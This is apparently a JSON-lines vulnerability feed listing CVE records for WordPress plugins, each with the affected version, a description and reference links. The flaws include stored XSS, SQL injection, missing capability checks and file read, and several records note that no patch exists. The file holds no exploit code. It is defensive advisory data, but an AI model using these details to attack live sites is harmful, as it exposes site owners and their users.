{"CVE_ID":"CVE-2025-7822","slug":"wp-wallcreeper","versionImpact":"1.6.1","description":"The WP Wallcreeper plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_notices hook in all versions up to, and including, 1.6.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enable and disable caching.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-wallcreeper\\\/trunk\\\/wp-wallcreeper.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-wallcreeper\\\/trunk\\\/wp-wallcreeper.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/629f36e3-f4a4-43a6-a98b-960088c8dd77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/629f36e3-f4a4-43a6-a98b-960088c8dd77?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0070","slug":"responsivevoice-text-to-speech","versionImpact":"1.7.6","description":"The ResponsiveVoice Text To Speech WordPress plugin through 1.7.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d8fbd1a-9fac-42ac-94e0-f8921deb1696\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d8fbd1a-9fac-42ac-94e0-f8921deb1696\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0273","slug":"custom-content-shortcode","versionImpact":"4.0.2","description":"The Custom Content Shortcode WordPress plugin through 4.0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5cafbba6-478f-4f5d-a2d4-60c6a22f2f1e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5cafbba6-478f-4f5d-a2d4-60c6a22f2f1e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2031","slug":"locatoraid","versionImpact":"3.9.14","description":"The Locatoraid Store Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions up to, and including, 3.9.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2900106\\\/locatoraid\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2900106\\\/locatoraid\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/locatoraid\\\/trunk\\\/modules\\\/front\\\/view_shortcode.php#L4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/locatoraid\\\/trunk\\\/modules\\\/front\\\/view_shortcode.php#L4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dba0a90b-f13c-4914-b6b7-278227ffc122?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dba0a90b-f13c-4914-b6b7-278227ffc122?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3093","slug":"yaysmtp","versionImpact":"2.4.5","description":"The YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email contents in versions up to, and including, 2.4.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68e6ec3a-c5fd-4f63-a9a0-2c9ddfb96e2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68e6ec3a-c5fd-4f63-a9a0-2c9ddfb96e2e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922163\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922163\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0786","slug":"enhanced-e-commerce-for-woocommerce-store","versionImpact":"6.9.1","description":"The Conversios \u2013 Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the ee_syncProductCategory function using the parameters conditionData, valueData, productArray, exclude and include in all versions up to, and including, 6.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c30801d1-9335-4bba-b344-f0ff57cecf84?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/trunk\\\/includes\\\/data\\\/class-tvc-ajax-file.php#L1979\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/trunk\\\/includes\\\/data\\\/class-tvc-ajax-file.php#L1979\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1296","slug":"brizy","versionImpact":"2.4.40","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block upload in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e1008ad-daa9-4785-9dd5-4cdeb10d7e59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e1008ad-daa9-4785-9dd5-4cdeb10d7e59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/post.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/post.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L196\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2967","slug":"front-editor","versionImpact":"4.4.1","description":"The Guest posting \/ Frontend Posting wordpress plugin \u2013 WP Front User Submit \/ Front Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form settings in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82eb759f-e8d5-40c6-998f-f6981d9d6644?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82eb759f-e8d5-40c6-998f-f6981d9d6644?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/front-editor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/front-editor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3231","slug":"popup4phone","versionImpact":"1.3.2","description":"The Popup4Phone WordPress plugin through 1.3.2 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81dbb5c0-ccdd-4af1-b2f2-71cb1b37fe93\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81dbb5c0-ccdd-4af1-b2f2-71cb1b37fe93\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8990","slug":"geo-mashup","versionImpact":"1.13.13","description":"The Geo Mashup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's geo_mashup_visible_posts_list shortcode in all versions up to, and including, 1.13.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88e74cb2-7b6f-43ac-bb30-4763c5afe493?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88e74cb2-7b6f-43ac-bb30-4763c5afe493?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-mashup\\\/trunk\\\/geo-mashup.php#L1755\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-mashup\\\/trunk\\\/geo-mashup.php#L1755\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/geo-mashup\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/geo-mashup\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159868\\\/#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159868\\\/#file0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159868\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159868\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10078","slug":"easy-post-types","versionImpact":"1.4.4","description":"The WP Easy Post Types plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 1.4.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete plugin options and posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d12c4b1c-23d0-430f-a6ea-0a3ab487ed10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d12c4b1c-23d0-430f-a6ea-0a3ab487ed10?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L116\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L119\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L119\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L123\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-post-types\\\/tags\\\/1.4.4\\\/custom-type.php#L134\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10710","slug":"wp-yadisk-files","versionImpact":"1.2.5","description":"The YaDisk Files WordPress plugin through 1.2.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/165ab698-c8b5-4412-a621-c5365d621fc5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/165ab698-c8b5-4412-a621-c5365d621fc5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13920","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.0","description":"The Order Export & Order Import for WooCommerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.6.0 via the download_file() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary log files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L751\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-import-export-for-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L751\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258567\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dba84eb3-f48a-4175-a652-7c11b12c9afc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dba84eb3-f48a-4175-a652-7c11b12c9afc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3107","slug":"newsletters-lite","versionImpact":"4.9.9.8","description":"The Newsletters plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby' parameter in all versions up to, and including, 4.9.9.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.8\\\/helpers\\\/shortcode.php#L1094\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletters-lite\\\/tags\\\/4.9.9.8\\\/helpers\\\/shortcode.php#L1094\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290691\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290691\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290691\\\/newsletters-lite\\\/trunk\\\/helpers\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290691\\\/newsletters-lite\\\/trunk\\\/helpers\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tribulant.com\\\/docs\\\/wordpress-mailing-list-plugin\\\/31\\\/#doc6:~:text=snippets%20and%20more.-,Release%20Notes,-The%20changelogs%20below\",\"name\":\"https:\\\/\\\/tribulant.com\\\/docs\\\/wordpress-mailing-list-plugin\\\/31\\\/#doc6:~:text=snippets%20and%20more.-,Release%20Notes,-The%20changelogs%20below\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newsletters-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/newsletters-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/397555cf-0b0c-4ce5-97ad-59f135f9d195?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/397555cf-0b0c-4ce5-97ad-59f135f9d195?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5564","slug":"gc-social-wall","versionImpact":"1.15","description":"The GC Social Wall plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gc_social_wall' shortcode in all versions up to, and including, 1.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/gc-social-wall\\\/trunk\\\/GCSocialWall.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/gc-social-wall\\\/trunk\\\/GCSocialWall.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe548ce-5dc9-4073-b755-d28e37720808?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe548ce-5dc9-4073-b755-d28e37720808?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7780","slug":"ai-engine","versionImpact":"2.9.4","description":"The AI Engine plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.4. The simpleTranscribeAudio endpoint fails to restrict URL schemes before calling get_audio(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to read any file on the web server and exfiltrate it via the plugin\u2019s OpenAI API integration.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/api.php#L625\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/api.php#L625\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/engines\\\/chatml.php#L829\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/engines\\\/chatml.php#L829\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332540\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332540\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ai-engine\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ai-engine\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/513274bc-3016-4adb-be78-b13c5fae9c03?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/513274bc-3016-4adb-be78-b13c5fae9c03?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
